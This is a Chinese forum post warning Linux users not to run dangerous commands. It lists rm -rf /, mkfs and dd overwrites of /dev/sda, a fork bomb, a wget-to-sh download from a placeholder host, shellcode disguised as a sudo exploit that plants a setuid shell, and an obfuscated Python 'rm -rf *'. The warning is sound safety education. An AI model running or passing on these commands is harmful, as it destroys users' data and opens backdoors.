再次声明, 请不要执行下列或类似下列的命令, 这些命令将会对你的计算机造成严重影响.
请不要以什么给普通用户教训来提高他们的安全意识等等托词来为自己不怀好意的行为作为借口!
http://ubuntuforums.org/announcement.php?a=54
Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
下列命令会删除所有文件, 删除当前目录, 删除当前目录下面的文件.
代码: 全选
rm -rf /
rm -rf .
rm -rf *
下列命令会摧毁整个文件系统, 重建分区.
代码: 全选
mkfs
mkfs.ext3
mkfs.anything
下列命令会清空整个硬盘.
代码: 全选
any_command > /dev/sda
dd if=something of=/dev/sda
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
下列命令会启动大量进程, 导致系统无法响应, 只能硬重启机器, 可能会导致数据损害.
代码: 全选
:(){:|:&};:
代码: 全选
fork while fork
Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source
Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
不要执行你不信任的人提供的shell脚本, 里面可能含有危险的命令和脚本, 不要随意解压别人提供的压缩包, 也许看起来很小, 结果解压出来会塞满整个硬盘.
代码: 全选
wget http://some_place/some_file
sh ./some_file
代码: 全选
wget http://some_place/some_file -O- | sh
A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
不要编译运行别人提供的不明代码
代码: 全选
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!
For example, 30 seconds in Python yields something like this:
代码: 全选
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'